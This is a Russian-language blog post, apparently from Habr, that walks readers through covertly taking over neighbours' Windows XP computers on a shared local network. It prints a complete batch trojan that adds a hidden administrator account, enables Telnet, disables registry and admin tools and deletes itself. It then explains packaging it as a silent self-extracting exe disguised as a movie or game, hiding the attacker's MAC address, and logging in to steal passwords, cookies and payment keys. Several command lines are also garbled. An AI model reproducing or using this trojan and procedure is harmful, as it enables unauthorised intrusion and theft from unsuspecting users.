Pull to refresh

Простейший скрытый способ получить доступ к нужному ПК из домашней сети

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель — это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно здесь) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCU\SOFTWARE\POLICIES\Microsoft\MMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%\system32\compmgmt.msc >nul
del Start_game.bat


1. Echo off (думаю всем понятно, объяснять не стоит).

2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.

3. Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬Ё­Ёбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.

4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.

5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».

6. Sc start TlntSvr >nul Стартуем службу телнет.

7.Reg add “HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).

8. Reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).

9. Reg add “HKCU\SOFTWARE\POLICIES\Microsoft\MMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%\system32\compmgmt.msc >nul
Удаляем mmc (Не обязательный параметр).

10. Reg add “HKCU\SOFTWARE\POLICIES\Microsoft\windows\System” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)

11. Del Start_game.bat Удаляем сам батник.

Батник готов. Сохраняем содержимое блокнота как .bat файл, под любым именем, в моем случае это Start_game.bat

Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.

З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.

(Делать можно необязательно exe файл можно создать и другие типы файлов).

Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.

Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.

При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.

З.Ы. Единственный минус батника — cmd.exe висит в процессах у пользователя в диспетчере задач. Но я думаю это не так страшно, так как обычные пользователи не особо заморачиваются в знании имени процесса в диспетчере задач.

http://www.youtube.com/watch?v=X5GD4Iu91CU&feature=g-upl&context=G2c89d80AUAAAAAAAAAA
Tags:
Hubs:
You can’t comment this publication because its author is not yet a full member of the community. You will be able to contact the author only after he or she has been invited by someone in the community. Until then, author’s username will be hidden by an alias.